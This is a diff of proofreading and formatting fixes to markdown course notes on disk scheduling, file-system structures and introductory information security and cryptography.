The **estimated seek time** (i.e to move the arm from one track to another) is approximated by:
|
||||
The **estimated seek time** (i.e. to move the arm from one track to another) is approximated by:
|
||||
|
||||
$$
|
||||
T_{s} = n \times m + s
|
||||
@@ -64,10 +64,10 @@ In which $T_{s}$ denotes the estimated seek time, $n$ the **number of tracks** t
|
||||
|
||||
> Let us assume a disk that rotates at 3600 rpm
|
||||
>
|
||||
> * One rotation = 16.7 ms
|
||||
> * The average **rotational latency** $T_{r}$ is then 8.3 ms
|
||||
> - One rotation = 16.7 ms
|
||||
> - The average **rotational latency** $T_{r}$ is then 8.3 ms
|
||||
>
|
||||
> Let **b** denote the **number of bytes transferred**, **N** the **number of bytes per track**, and **rpm** the **rotation speed in rotations per minute**, the per track, the transfer time, $T_{t}$, is then given by:
|
||||
> Let **b** denote the **number of bytes transferred**, **N** the **number of bytes per track**, and **rpm** the **rotation speed in rotations per minute**. The transfer time per track, $T_{t}$, is then given by:
|
||||
>
|
||||
> $$
|
||||
> T_{t} = \frac b N \times \frac {ms\space per\space minute}{rpm}
|
||||
@@ -75,25 +75,25 @@ In which $T_{s}$ denotes the estimated seek time, $n$ the **number of tracks** t
|
||||
>
|
||||
> $N$ bytes take 1 revolution => $\frac{60000}{3600}$ ms = $\frac {ms\space per\space minute}{rpm}$
|
||||
>
|
||||
> $b$ contiguous bytes takes $\frac{b}{N}$ revolutions.
|
||||
> $b$ contiguous bytes take $\frac{b}{N}$ revolutions.
|
||||
|
||||
> Read a file of **size 256 sectors** with;
|
||||
> Read a file of **size 256 sectors** with:
|
||||
>
|
||||
> * $T_{s}$ = 20 ms (average seek time)
|
||||
> * 32 sectors per track
|
||||
> - $T_{s}$ = 20 ms (average seek time)
|
||||
> - 32 sectors per track
|
||||
>
|
||||
> Suppose the file is stored as compact as possible (its stored contiguously)
|
||||
> Suppose the file is stored as compactly as possible (it's stored contiguously)
|
||||
>
|
||||
> * The first track takes: seek time + rotational delay + transfer time
|
||||
> - The first track takes: seek time + rotational delay + transfer time
|
||||
> $20 + 8.3 + 16.7 = 45ms$
|
||||
> * Assuming no cylinder skew and neglecting small seeks between tracks we only need to account for rotational delay + transfer time
|
||||
> - Assuming no cylinder skew and neglecting small seeks between tracks we only need to account for rotational delay + transfer time
|
||||
> $8.3+16.7=25ms$
|
||||
>
|
||||
> The total time is $45+7\times 25 = 220ms = 0.22s$
|
||||
|
||||
> In case the access is not sequential but at **random for the sectors** we get:
|
||||
>
|
||||
> * Time per sector = $T_{s}+T_{r}+T_{t} = 20+8.3+0.5=28.8ms$
|
||||
> - Time per sector = $T_{s}+T_{r}+T_{t} = 20+8.3+0.5=28.8ms$
|
||||
> $T_{t} = 16.7\times \frac {1}{32} = 0.5$
|
||||
>
|
||||
> It is important to **position the sectors carefully** and **avoid disk fragmentation**
|
||||
@@ -102,12 +102,12 @@ In which $T_{s}$ denotes the estimated seek time, $n$ the **number of tracks** t
|
||||
|
||||
The OS must use the hardware efficiently:
|
||||
|
||||
* The file system can **position/organise files strategically**
|
||||
* Having **multiple disk requests** in a queue allows us to **minimise** the **arm movement**
|
||||
- The file system can **position/organise files strategically**
|
||||
- Having **multiple disk requests** in a queue allows us to **minimise** the **arm movement**
|
||||
|
||||
Note that every I/O operation goes through a system call, allowing the **OS to intercept the request and re sequence it**.
|
||||
Note that every I/O operation goes through a system call, allowing the **OS to intercept the request and resequence it**.
|
||||
|
||||
If the drive **is free**, the request can be serviced immediately, if not the request is queued.
|
||||
If the drive **is free**, the request can be serviced immediately. If not, the request is queued.
|
||||
|
||||
In a dynamic situation, several I/O requests will be **made over time** that are kept in a **table of requested sectors per cylinder.**
|
||||
|
||||
@@ -125,13 +125,11 @@ In a dynamic situation, several I/O requests will be **made over time** that are
|
||||
>
|
||||
> 
|
||||
|
||||
|
||||
|
||||
#### Shortest Seek Time First
|
||||
|
||||
> Selects the request that is closest to the current head position to reduce head movement
|
||||
>
|
||||
> * This allows us to gain **~50%** over FCFS
|
||||
> - This allows us to gain **~50%** over FCFS
|
||||
>
|
||||
> Total length is: `|11-12|+|12-9|+|9-16|+|16-1|+|1-34|+|34-36|=61`
|
||||
>
|
||||
@@ -139,16 +137,16 @@ In a dynamic situation, several I/O requests will be **made over time** that are
|
||||
>
|
||||
> Disadvantages:
|
||||
>
|
||||
> * Could result in starvation:
|
||||
> * The **arm stays in the middle of the disk** in case of heavy load, edge cylinders are poorly served - the strategy is biased
|
||||
> * Continuously arriving requests for the same location could **starve other regions**
|
||||
> - Could result in starvation:
|
||||
> - The **arm stays in the middle of the disk** in case of heavy load, edge cylinders are poorly served - the strategy is biased
|
||||
> - Continuously arriving requests for the same location could **starve other regions**
|
||||
|
||||
#### SCAN
|
||||
|
||||
> **Keep moving in the same direction** until end is reached
|
||||
>
|
||||
> * It continues in the current direction, **servicing all pending requests** as it passes over them
|
||||
> * When it gets to the **last cylinder**, it **reverses direction** and **services pending requests**
|
||||
> - It continues in the current direction, **servicing all pending requests** as it passes over them
|
||||
> - When it gets to the **last cylinder**, it **reverses direction** and **services pending requests**
|
||||
>
|
||||
> Total length: `|11-12|+|12-16|+|16-34|+|34-36|+|36-9|+|9-1|=60`
|
||||
>
|
||||
@@ -156,16 +154,16 @@ In a dynamic situation, several I/O requests will be **made over time** that are
|
||||
>
|
||||
> **Disadvantages**:
|
||||
>
|
||||
> * The **upper limit** on the waiting time is $2\space\times$ number of cylinders (no starvation)
|
||||
> * The **middle cylinders are favoured** if the disk is heavily used.
|
||||
> - The **upper limit** on the waiting time is $2\space\times$ number of cylinders (no starvation)
|
||||
> - The **middle cylinders are favoured** if the disk is heavily used.
|
||||
|
||||
##### C-SCAN
|
||||
|
||||
> Once the outer/inner side of the disk has been reached, the **requests at the other end of the disk** have been **waiting the longest**
|
||||
>
|
||||
> * SCAN can be improved by using a circular => C-SCAN
|
||||
> * When the disk arm gets to the last cylinder of the disk, it **reverses direction** but **does not service requests** on the return.
|
||||
> * It is **fairer** and equalises **response times on the disk**
|
||||
> - SCAN can be improved by using a circular => C-SCAN
|
||||
> - When the disk arm gets to the last cylinder of the disk, it **reverses direction** but **does not service requests** on the return.
|
||||
> - It is **fairer** and equalises **response times on the disk**
|
||||
>
|
||||
> Total length: `|11-12|+|12-16|+|16-34|+|34-36|+|36-1|+|1-9|=68`
|
||||
|
||||
@@ -173,8 +171,8 @@ In a dynamic situation, several I/O requests will be **made over time** that are
|
||||
|
||||
> Look-SCAN moves to the last cylinder containing **the first or last request** (as opposed to the first/last cylinder on the disk like SCAN)
|
||||
>
|
||||
> * However, seeks are **cylinder by cylinder** and one cylinder contains multiple tracks
|
||||
> * It may happen that the arm "sticks" to a cylinder
|
||||
> - However, seeks are **cylinder by cylinder** and one cylinder contains multiple tracks
|
||||
> - It may happen that the arm "sticks" to a cylinder
|
||||
|
||||
##### N-Step SCAN
|
||||
|
||||
@@ -193,10 +191,10 @@ In a dynamic situation, several I/O requests will be **made over time** that are
|
||||
|
||||
For current drives, the time **required to seek a new cylinder** is more than the **rotational time**.
|
||||
|
||||
* It makes sense to **read more sectors than actually required**
|
||||
* **Read** sectors during rotational delay (the sectors that just so happen to pass under the control arm)
|
||||
* **Modern controllers read multiple sectors** when asked for the data from one sector **track-at-a-time caching**.
|
||||
- It makes sense to **read more sectors than actually required**
|
||||
- **Read** sectors during rotational delay (the sectors that just so happen to pass under the control arm)
|
||||
- **Modern controllers read multiple sectors** when asked for the data from one sector **track-at-a-time caching**.
|
||||
|
||||
### Scheduling on SSDs
|
||||
|
||||
SSDs don't have $T_{seek}$ or rotational delay, we can use FCFS (SSTF, SCAN etc may reduce performace due to no head to move).
|
||||
SSDs don't have $T_{seek}$ or rotational delay, so we can use FCFS (SSTF, SCAN etc. may reduce performance because there is no head to move).
|
||||
@@ -6,39 +6,39 @@
|
||||
|
||||
A **user view** that defines a file system in terms of the **abstractions** that the operating system provides
|
||||
|
||||
An **implementation view** that defined the file system in terms of its **low level implementation**
|
||||
An **implementation view** that defines the file system in terms of its **low-level implementation**
|
||||
|
||||
**Important aspects of the user view**
|
||||
|
||||
> * The **file abstraction** which **hides** implementation details from the user
|
||||
> * File **naming policies**, user file **attributes** (size, protection, owner etc)
|
||||
> * There are also **system attributes** for files (e.g. non-human readable, archive flag, temp flag)
|
||||
> * **Directory structures** and organisation
|
||||
> * **System calls** to interact with the file system
|
||||
> - The **file abstraction** which **hides** implementation details from the user
|
||||
> - File **naming policies**, user file **attributes** (size, protection, owner etc)
|
||||
> - There are also **system attributes** for files (e.g. non-human readable, archive flag, temp flag)
|
||||
> - **Directory structures** and organisation
|
||||
> - **System calls** to interact with the file system
|
||||
>
|
||||
> The user view defines how the file system looks to regular users and relates to **abstractions**.
|
||||
|
||||
#### File Types
|
||||
|
||||
Many OS's support several types of file. Both windows and Unix have regular files and directories:
|
||||
Many operating systems support several types of file. Both Windows and Unix have regular files and directories:
|
||||
|
||||
* **Regular files** contain user data in **ASCII** or **binary** format
|
||||
* **Directories** group files together (but are files on an implementation level)
|
||||
- **Regular files** contain user data in **ASCII** or **binary** format
|
||||
- **Directories** group files together (but are files on an implementation level)
|
||||
|
||||
Unix also has character and block special files:
|
||||
|
||||
* **Character special files** are used to model **serial I/O devices** (keyboards, printers etc)
|
||||
* **Block special files** are used to model drives
|
||||
- **Character special files** are used to model **serial I/O devices** (keyboards, printers etc)
|
||||
- **Block special files** are used to model drives
|
||||
|
||||
### System Calls
|
||||
|
||||
File Control Blocks (FCBs) are kernel data structures (they are protected and only accessible in kernel mode)
|
||||
|
||||
* Allowing user applications to access them directly could compromise their integrity
|
||||
* System calls enable a **user application** to **ask the OS** to carry out an action on it's behalf (in kernel mode)
|
||||
* There are **two different categories** of **system calls**
|
||||
* **File manipulation**: `open()`, `close()`, `read()`, `write()` ...
|
||||
* **Directory manipulation**: `create()`, `delete()`, `rename()`, `link()` ...
|
||||
- Allowing user applications to access them directly could compromise their integrity
|
||||
- System calls enable a **user application** to **ask the OS** to carry out an action on its behalf (in kernel mode)
|
||||
- There are **two different categories** of **system calls**
|
||||
- **File manipulation**: `open()`, `close()`, `read()`, `write()` ...
|
||||
- **Directory manipulation**: `create()`, `delete()`, `rename()`, `link()` ...
|
||||
|
||||
### File Structures
|
||||
|
||||
@@ -46,8 +46,8 @@ File Control Blocks (FCBs) are kernel data structures (they are protected and on
|
||||
|
||||
**Two or multiple level directories**: tree structures
|
||||
|
||||
* **Absolute path name**: from the root of the file system
|
||||
* **Relative path name**: the current working directory is used as the starting point
|
||||
- **Absolute path name**: from the root of the file system
|
||||
- **Relative path name**: the current working directory is used as the starting point
|
||||
|
||||
**Directed acyclic graph (DAG)**: allows files to be shared (links files or sub-directories) but **cycles are forbidden**
|
||||
|
||||
@@ -55,29 +55,29 @@ File Control Blocks (FCBs) are kernel data structures (they are protected and on
|
||||
|
||||
The use of **DAG** and **generic graph structures** results in **significant complications** in the implementation
|
||||
|
||||
* Trees are a DAG with the restriction that a child can only have one parent and don't contain cycles.
|
||||
- Trees are a DAG with the restriction that a child can only have one parent and don't contain cycles.
|
||||
|
||||
When searching the file system:
|
||||
|
||||
* Cycles can result in **infinite loops**
|
||||
* Sub-trees can be **traversed multiple times**
|
||||
* Files have **multiple absolute file names**
|
||||
* Deleting files becomes a lot more complicated
|
||||
* Links may no longer point to a file
|
||||
* Inaccessible cycles may exist
|
||||
* A garbage collection scheme may be required to remove files that are no longer accessible from the file system tree.
|
||||
- Cycles can result in **infinite loops**
|
||||
- Sub-trees can be **traversed multiple times**
|
||||
- Files have **multiple absolute file names**
|
||||
- Deleting files becomes a lot more complicated
|
||||
- Links may no longer point to a file
|
||||
- Inaccessible cycles may exist
|
||||
- A garbage collection scheme may be required to remove files that are no longer accessible from the file system tree.
|
||||
|
||||
#### Directory Implementations
|
||||
|
||||
Directories contain a list of **human readable file names** that are mapped onto **unique identifiers** and **disk locations**
|
||||
Directories contain a list of **human-readable file names** that are mapped onto **unique identifiers** and **disk locations**
|
||||
|
||||
* They provide a mapping of the logical file onto the physical location
|
||||
- They provide a mapping of the logical file onto the physical location
|
||||
|
||||
Retrieving a file comes down to **searching the directory file** as fast as possible:
|
||||
|
||||
* A **simple random order of directory** entries might be insufficient (search time is linear as a function of the number of entries)
|
||||
* Indexes or **hash tables** can be used.
|
||||
* They can store all **file related attributes** (file name, disk address - Windows) or they can **contain a pointer** to the data structure that contains the details of the file (Unix)
|
||||
- A **simple random order of directory** entries might be insufficient (search time is linear as a function of the number of entries)
|
||||
- Indexes or **hash tables** can be used.
|
||||
- They can store all **file-related attributes** (file name, disk address - Windows) or they can **contain a pointer** to the data structure that contains the details of the file (Unix)
|
||||
|
||||

|
||||
|
||||
@@ -85,41 +85,41 @@ Retrieving a file comes down to **searching the directory file** as fast as poss
|
||||
|
||||
Similar to files, **directories** are manipulated using **system calls**
|
||||
|
||||
* `create/delete`: new directory is created/deleted.
|
||||
* `opendir, closeddir`: add/free directory to/from internal tables
|
||||
* `readdir`: return the next entry in the directory file
|
||||
- `create/delete`: new directory is created/deleted.
|
||||
- `opendir, closeddir`: add/free directory to/from internal tables
|
||||
- `readdir`: return the next entry in the directory file
|
||||
|
||||
**Directories** are **special files** that **group files** together and of which the **structure is defined** by the **file system**
|
||||
|
||||
* A bit is set to indicate that they are directories
|
||||
* In Linux when you create a directory, two files are in that directory that the user has no control over. These files are represented as `.` and `..`
|
||||
* `.` - a file dealing with file permissions
|
||||
* `..` - represents the parent directory (`cd ..`)
|
||||
- A bit is set to indicate that they are directories
|
||||
- In Linux when you create a directory, two files are in that directory that the user has no control over. These files are represented as `.` and `..`
|
||||
- `.` - a file dealing with file permissions
|
||||
- `..` - represents the parent directory (`cd ..`)
|
||||
|
||||
##### Implementation
|
||||
|
||||
> Regardless of the type of file system, a number of **additional considerations** need to be made
|
||||
>
|
||||
> * **Disk Partitions**, **partition tables**, **boot sectors** etc
|
||||
> * Free **space management**
|
||||
> * System wide and per process **file tables**
|
||||
> - **Disk Partitions**, **partition tables**, **boot sectors** etc
|
||||
> - Free **space management**
|
||||
> - System-wide and per-process **file tables**
|
||||
>
|
||||
> **Low level formatting** writes sectors to the disk
|
||||
> **Low-level formatting** writes sectors to the disk
|
||||
>
|
||||
> **High level formatting** imposes a file system on top of this (using **blocks** that can cover multiple **sectors**)
|
||||
> **High-level formatting** imposes a file system on top of this (using **blocks** that can cover multiple **sectors**)
|
||||
|
||||
### Partitions
|
||||
|
||||
Disks are usually divided into **multiple partitions**
|
||||
|
||||
* An independent file system may exist on each partiton
|
||||
- An independent file system may exist on each partition
|
||||
|
||||
**Master Boot Record**
|
||||
|
||||
* Located as the start of the entire drive
|
||||
* Used to boot the computer (BIOS reads and executes MBR)
|
||||
* Contains **partition table** at its end with **active partition**.
|
||||
* One partition is listed as **active** containing a boot block to load the operating system.
|
||||
- Located at the start of the entire drive
|
||||
- Used to boot the computer (BIOS reads and executes MBR)
|
||||
- Contains **partition table** at its end with **active partition**.
|
||||
- One partition is listed as **active** containing a boot block to load the operating system.
|
||||
|
||||

|
||||
|
||||
@@ -127,18 +127,18 @@ Disks are usually divided into **multiple partitions**
|
||||
|
||||
> The partition contains
|
||||
>
|
||||
> * The partition **boot block**:
|
||||
> * Contains code to boot the OS
|
||||
> * Every partition has a boot block - even if it does not contain an OS
|
||||
> * **Super block** contains the partitions details e.g. partition size, number of blocks, I-node table etc
|
||||
> * **Free space management** contains a bitmap or linked list that indicates the free blocks.
|
||||
> * A linked list of disk blocks (also known as grouping)
|
||||
> * We use free blocks to hold the **number of the free blocks**. Since the free list shrinks when the disk becomes full, this is not wasted space
|
||||
> * **Blocks are linked together**. The size of the list **grows with the size of the disk** and **shrinks with the size of the blocks**
|
||||
> * Linked lists can be modified by **keeping track of the number of consecutive free blocks** for each entry (known as counting)
|
||||
> * **I-Nodes**: An array of data structures, one per file, telling all about the files
|
||||
> * **Root directory**: the top of the file-system tree
|
||||
> * **Data**: files and directories
|
||||
> - The partition **boot block**:
|
||||
> - Contains code to boot the OS
|
||||
> - Every partition has a boot block - even if it does not contain an OS
|
||||
> - **Super block** contains the partition's details, e.g. partition size, number of blocks and I-node table
|
||||
> - **Free space management** contains a bitmap or linked list that indicates the free blocks.
|
||||
> - A linked list of disk blocks (also known as grouping)
|
||||
> - We use free blocks to hold the **number of the free blocks**. Since the free list shrinks when the disk becomes full, this is not wasted space
|
||||
> - **Blocks are linked together**. The size of the list **grows with the size of the disk** and **shrinks with the size of the blocks**
|
||||
> - Linked lists can be modified by **keeping track of the number of consecutive free blocks** for each entry (known as counting)
|
||||
> - **I-Nodes**: An array of data structures, one per file, telling all about the files
|
||||
> - **Root directory**: the top of the file-system tree
|
||||
> - **Data**: files and directories
|
||||
|
||||

|
||||
|
||||
@@ -148,26 +148,21 @@ Free space management with linked list (on the left) and bitmaps (on the right)
|
||||
|
||||
**Bitmaps**
|
||||
|
||||
* Require extra space
|
||||
* Keeping it in main memory is possible but only for small disk
|
||||
- Require extra space
|
||||
- Keeping it in main memory is possible, but only for small disks
|
||||
|
||||
**Linked lists**
|
||||
|
||||
* No wasted disk space
|
||||
* We only need to keep in memory one block of pointers (load a new block when needed)
|
||||
- No wasted disk space
|
||||
- We only need to keep in memory one block of pointers (load a new block when needed)
|
||||
|
||||
Apart from the free space memory tables, there is a number of key data structures stored in memory:
|
||||
Apart from the free space memory tables, there are a number of key data structures stored in memory:
|
||||
|
||||
* An in-memory mount table (table with different partitions that have been mounted)
|
||||
* An in-memory directory cache of recently accessed directory information
|
||||
* A **system-wide open file table**, containing a copy of the FCB for every currently open file in the system, including location on disk, file size and **open count** (number of processes that use the file)
|
||||
* A **per-process open file table**, containing a pointer to the system open file table.
|
||||
- An in-memory mount table (table with different partitions that have been mounted)
|
||||
- An in-memory directory cache of recently accessed directory information
|
||||
- A **system-wide open file table**, containing a copy of the FCB for every currently open file in the system, including location on disk, file size and **open count** (number of processes that use the file)
|
||||
- A **per-process open file table**, containing a pointer to the system open file table.
|
||||
|
||||

|
||||
|
||||

|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -19,22 +19,22 @@ Files will be composed of a number of blocks. Files are **sequential** or **rand
|
||||
>
|
||||
> Allocation of free space can be done using **first fit, best fit, next fit**.
|
||||
>
|
||||
> * However when files are removed, this can lead to external fragmentation.
|
||||
> - However when files are removed, this can lead to external fragmentation.
|
||||
>
|
||||
> **Advantages**
|
||||
>
|
||||
> * **Simple** to implement - only location of the first block and the length of the file must be stored
|
||||
> * **Optimal read/write performance** - blocks are clustered in nearby sectors, hence the seek time (of the hard drive) is minimised
|
||||
> - **Simple** to implement - only location of the first block and the length of the file must be stored
|
||||
> - **Optimal read/write performance** - blocks are clustered in nearby sectors, hence the seek time (of the hard drive) is minimised
|
||||
>
|
||||
> **Disadvantages**
|
||||
>
|
||||
> * The **exact size** is not known before hand (what if the file size exceeds the initially allocated disk space)
|
||||
> * **Allocation algorithms** needed to decide which free blocks to allocate to a given file
|
||||
> * Deleting a file results in **external fragmentation**
|
||||
> - The **exact size** is not known beforehand (what if the file size exceeds the initially allocated disk space)
|
||||
> - **Allocation algorithms** needed to decide which free blocks to allocate to a given file
|
||||
> - Deleting a file results in **external fragmentation**
|
||||
>
|
||||
> Contiguous allocation is still in use in **CD-ROMS & DVDs**
|
||||
>
|
||||
> * External fragmentation isn't an issue here as files are written once.
|
||||
> - External fragmentation isn't an issue here as files are written once.
|
||||
|
||||
#### Linked List Allocation
|
||||
|
||||
@@ -42,45 +42,45 @@ To avoid external fragmentation, files are stored in **separate blocks** that ar
|
||||
|
||||
> Only the address of the first block has to be stored to locate a file
|
||||
>
|
||||
> * Each block contains a **data pointer** to the next block
|
||||
> - Each block contains a **data pointer** to the next block
|
||||
>
|
||||
> **Advantages**
|
||||
>
|
||||
> * Easy to maintain (only the first block needs to be maintained in directory entry)
|
||||
> * File sizes can **grow and shrink dynamically**
|
||||
> * There is **no external fragmentation** - every possible block/sector is used (can be used)
|
||||
> * Sequential access is straight forward - although **more seek operations** required
|
||||
> - Easy to maintain (only the first block needs to be maintained in directory entry)
|
||||
> - File sizes can **grow and shrink dynamically**
|
||||
> - There is **no external fragmentation** - every possible block/sector is used (can be used)
|
||||
> - Sequential access is straightforward - although **more seek operations** are required
|
||||
>
|
||||
> **Disadvantages**
|
||||
>
|
||||
> * **Random access is very slow**, to retrieve a block in the middle, one has to walk through the list from the start
|
||||
> * There is some **internal fragmentation** - on average the last half of the block is left unused
|
||||
> * Internal fragmentation will reduce for **smaller block sizes**
|
||||
> * However, **larger blocks** will be **faster**
|
||||
> * Space for data is lost within the blocks due to the pointer, the data in a **block is no longer a power of 2**
|
||||
> * **Diminished reliability**: if one block is corrupted/lost, access to the rest of the file is lost.
|
||||
> - **Random access is very slow**, to retrieve a block in the middle, one has to walk through the list from the start
|
||||
> - There is some **internal fragmentation** - on average the last half of the block is left unused
|
||||
> - Internal fragmentation will reduce for **smaller block sizes**
|
||||
> - However, **larger blocks** will be **faster**
|
||||
> - Space for data is lost within the blocks due to the pointer. The data in a **block is no longer a power of 2**
|
||||
> - **Diminished reliability**: if one block is corrupted/lost, access to the rest of the file is lost.
|
||||
|
||||

|
||||
|
||||
##### File Allocation Tables
|
||||
|
||||
* Store the linked-list pointers in a **separate index table** called a **file allocation table** in memory.
|
||||
- Store the linked-list pointers in a **separate index table** called a **file allocation table** in memory.
|
||||
|
||||

|
||||
|
||||
> **Advantages**
|
||||
>
|
||||
> * **Block size remains power of 2** - no more space is lost to the pointer
|
||||
> * **Index table** can be kept in memory allowing fast non-sequential access
|
||||
> - **Block size remains a power of 2** - no more space is lost to the pointer
|
||||
> - **Index table** can be kept in memory allowing fast non-sequential access
|
||||
>
|
||||
> **Disadvantages**
|
||||
>
|
||||
> * The size of the file allocation table grows with the number of blocks, and hence the size of the disk
|
||||
> * For a 200GB disk, with 1KB block size, 200 million entries are required, assuming that each entry at the table occupies 4 bytes, this required 800MB of main memory.
|
||||
> - The size of the file allocation table grows with the number of blocks, and hence the size of the disk
|
||||
> - For a 200 GB disk with a 1 KB block size, 200 million entries are required. Assuming that each entry in the table occupies 4 bytes, this requires 800 MB of main memory.
|
||||
|
||||
#### I-Nodes
|
||||
|
||||
Each file has a small data structure (on disk) called an **I-node** (index-node) that contains it's attributes and block pointers
|
||||
Each file has a small data structure (on disk) called an **I-node** (index-node) that contains its attributes and block pointers.
|
||||
|
||||
> In contrast to FAT, an I-node is **only loaded when a file is open**
|
||||
>
|
||||
|
||||
@@ -21,13 +21,13 @@ Assets could be physical or virtual data
|
||||
|
||||
- Possibly thousands of users
|
||||
- Distributed over wide networks
|
||||
- Not all users are inherently trust worthy
|
||||
- Not all users are inherently trustworthy
|
||||
- More and more things are moving to electronic
|
||||
- Requiring protocols to manage them
|
||||
|
||||
### Attacks
|
||||
|
||||
- Monetary transaction need security
|
||||
- Monetary transactions need security
|
||||
|
||||
This is what most interactions look like and therefore attacks are based on this communication
|
||||
|
||||
@@ -45,13 +45,13 @@ What if the server gets hacked, we can use **hash functions**
|
||||
|
||||
###### Digital Certificates
|
||||
|
||||
However, this can be bypassed if the clients machine is hacked
|
||||
However, this can be bypassed if the client’s machine is hacked
|
||||
|
||||
We have to ensure the client is running anti virus software and practices good avoidance.
|
||||
We have to ensure the client is running antivirus software and practises good avoidance.
|
||||
|
||||
###### Insider attacks
|
||||
|
||||
To stop this the company must practice good security such as:
|
||||
To stop this the company must practise good security such as:
|
||||
|
||||
- Database security Controls
|
||||
- File access controls
|
||||
@@ -79,7 +79,7 @@ It is often simply an arms race between developers & researchers and malicious u
|
||||
|
||||
#### Computer Security
|
||||
|
||||
- Usually defined as three keys areas (**CIA**)
|
||||
- Usually defined as three key areas (**CIA**)
|
||||
|
||||
1. Confidentiality
|
||||
- Prevention of unauthorised *disclosure* of information
|
||||
@@ -91,10 +91,10 @@ It is often simply an arms race between developers & researchers and malicious u
|
||||
- Distributed bank transactions or database records
|
||||
- Just because we have **integrity**, doesn’t mean we have **authenticity**
|
||||
- Can we verify the sender? does it have freshness?
|
||||
- Authenticity = Intercity + Freshness
|
||||
- Authenticity = Integrity + Freshness
|
||||
3. Availability
|
||||
- Prevention of unauthorised *withholding* of information or resources
|
||||
- The property of being accessible is an usable upon demand by an authorised entity
|
||||
- The property of being accessible and usable upon demand by an authorised entity
|
||||
- In other words prevent DoS attacks
|
||||
- e.g. redundant power supplies, firewall packet filtering
|
||||
|
||||
@@ -117,21 +117,21 @@ It is often simply an arms race between developers & researchers and malicious u
|
||||
|
||||
> “Security-unaware users have specific security requirements but no security expertise”
|
||||
|
||||
- There is a trade off between security and ease of use
|
||||
- There is a trade-off between security and ease of use
|
||||
- Increased resource demands
|
||||
- Interferes with working patterns
|
||||
|
||||
###### Added complexity
|
||||
|
||||
- Often user experience is place at the forefront of software engineering
|
||||
- Often user experience is placed at the forefront of software engineering
|
||||
- This is usually not compatible with security
|
||||
- Security can be seen as controlling access to information
|
||||
- This is hard, we usually control access to data instead
|
||||
- Data - a means to represent information
|
||||
- Information - an interpretation of that data
|
||||
- Focusing on data can still leave information vulnerable
|
||||
- for example: Mikes criminal record not found
|
||||
- vs you do not have permission to access mikes criminal record
|
||||
- for example: Mike’s criminal record not found
|
||||
- vs you do not have permission to access Mike’s criminal record
|
||||
|
||||
#### Security Design
|
||||
|
||||
|
||||
@@ -39,7 +39,7 @@ Note the lack of policies on personally owned devices, considering ~100% of peop
|
||||
|
||||
**Removal**
|
||||
|
||||
System is modified so that a particular feature, and the associated risk is removed.
|
||||
System is modified so that a particular feature and the associated risk are removed.
|
||||
|
||||
**Reduction**
|
||||
|
||||
@@ -51,7 +51,7 @@ Nothing is done - the risk is small and insignificant
|
||||
|
||||
**Relocation**
|
||||
|
||||
The system is unchanged, but risk is transferred to another party e.g. an insurance
|
||||
The system is unchanged, but risk is transferred to another party e.g. an insurer
|
||||
|
||||
###### Management need to know
|
||||
|
||||
@@ -63,8 +63,8 @@ The system is unchanged, but risk is transferred to another party e.g. an insura
|
||||
|
||||
### Baseline Security
|
||||
|
||||
- A minimum level of protection that should be considered by all organisations ulitilising IT systems
|
||||
- Although many organisation will require protection considerably above baseline
|
||||
- A minimum level of protection that should be considered by all organisations utilising IT systems
|
||||
- Although many organisations will require protection considerably above baseline
|
||||
- Can provide a *common* basis for mutual trust
|
||||
|
||||
###### Cyber Essentials
|
||||
@@ -81,7 +81,7 @@ The system is unchanged, but risk is transferred to another party e.g. an insura
|
||||
|
||||
- the central element of the ISO 27000 series
|
||||
- describes best practice for an ISMS (information security management system)
|
||||
- outlines of each aspect of an ISMS, and other standards provide further detail (e.g. 27002 for controls, 27003 for implementation, 27004 for evaluation)
|
||||
- outlines each aspect of an ISMS, and other standards provide further detail (e.g. 27002 for controls, 27003 for implementation, 27004 for evaluation)
|
||||
|
||||
###### ISO 27002
|
||||
|
||||
|
||||
@@ -12,7 +12,7 @@
|
||||
- Stream ciphers use an initial seed key to generate an infinite keystream of random looking bits
|
||||
- The message and keystream are usually combined using an `xor` ($\oplus$) which is reversible if applied twice
|
||||
|
||||
- How ever using the same keystream to encrypt two messages makes messages easy to break
|
||||
- However, using the same keystream to encrypt two messages makes messages easy to break
|
||||
- A random *number used once* nonce is added as an additional seed
|
||||
- The nonce is not a secret, it simply ensures the keystream is new
|
||||
|
||||
@@ -69,15 +69,15 @@
|
||||
|
||||
1. Brute force
|
||||
- Weakest attack, guessing the key
|
||||
- If the key is $2^{128}$, on a super computer would take $10^9$ years
|
||||
- If the key is $2^{128}$, on a supercomputer it would take $10^9$ years
|
||||
2. Cipher text only
|
||||
- Static analysis on the cipher text, frequency analysis etc
|
||||
- e.g. looking at the enginma machine and recognising a letter cannot be itself
|
||||
- e.g. looking at the Enigma machine and recognising a letter cannot be itself
|
||||
3. Known plaintext
|
||||
- Where you know some plaintext and the corresponding ciphertext
|
||||
- e.g. Enigma being broken using “heil hitler”
|
||||
4. Chosen plaintext
|
||||
- Seeing if certain plain-texts takes the algorithm longer/shorter
|
||||
- Seeing if certain plain-texts take the algorithm longer/shorter
|
||||
5. Chosen ciphertext
|
||||
6. Related-key attack
|
||||
- Get the same message encrypted in different keys
|
||||
@@ -88,7 +88,7 @@ Modern algorithms are expected to overcome these attacks trivially
|
||||
## Asymmetric Encryption
|
||||
|
||||
- Two keys, a public & private key
|
||||
- Public-key asymmetric cryptography hinges upon the premuse that:
|
||||
- Public-key asymmetric cryptography hinges upon the premise that:
|
||||
- It is computationally infeasible to calculate a private key from a public key
|
||||
- In practice this is achieved through intractable mathematical problems
|
||||
|
||||
@@ -104,17 +104,16 @@ It is extremely easy to go from a -> A but extremely difficult to go backwards.
|
||||
|
||||
#### Public key Encryption
|
||||
|
||||
- Client encrypts message with servers public key, now only the server’s private key can be used to read it.
|
||||
- Client encrypts message with the server’s public key; now only the server’s private key can be used to read it.
|
||||
- The authenticity of signatures generated by the private key can be verified by the public key
|
||||
|
||||

|
||||
|
||||
##### Public key Algorithms
|
||||
|
||||
| Algorithm | Key Exchange | Encryption | Digital Signitures | Mathematical Problem | Elliptic Curves | Typical Key Size |
|
||||
| Algorithm | Key Exchange | Encryption | Digital Signatures | Mathematical Problem | Elliptic Curves | Typical Key Size |
|
||||
| :------------- | :----------: | :--------: | :----------------: | --------------------- | :-------------: | ---------------- |
|
||||
| Diffie-Hellmen | ✅ | ❌ | ❌ | Discrete Logs | ✅ | 256 |
|
||||
| Diffie-Hellman | ✅ | ❌ | ❌ | Discrete Logs | ✅ | 256 |
|
||||
| `RSA` | ❌ | ✅ | ✅ | Integer Factorisation | ❌ | 2048/4096 |
|
||||
| `Elgamal` | ❌ | ✅ | ✅ | Discrete Logs | ✅ | 2048 |
|
||||
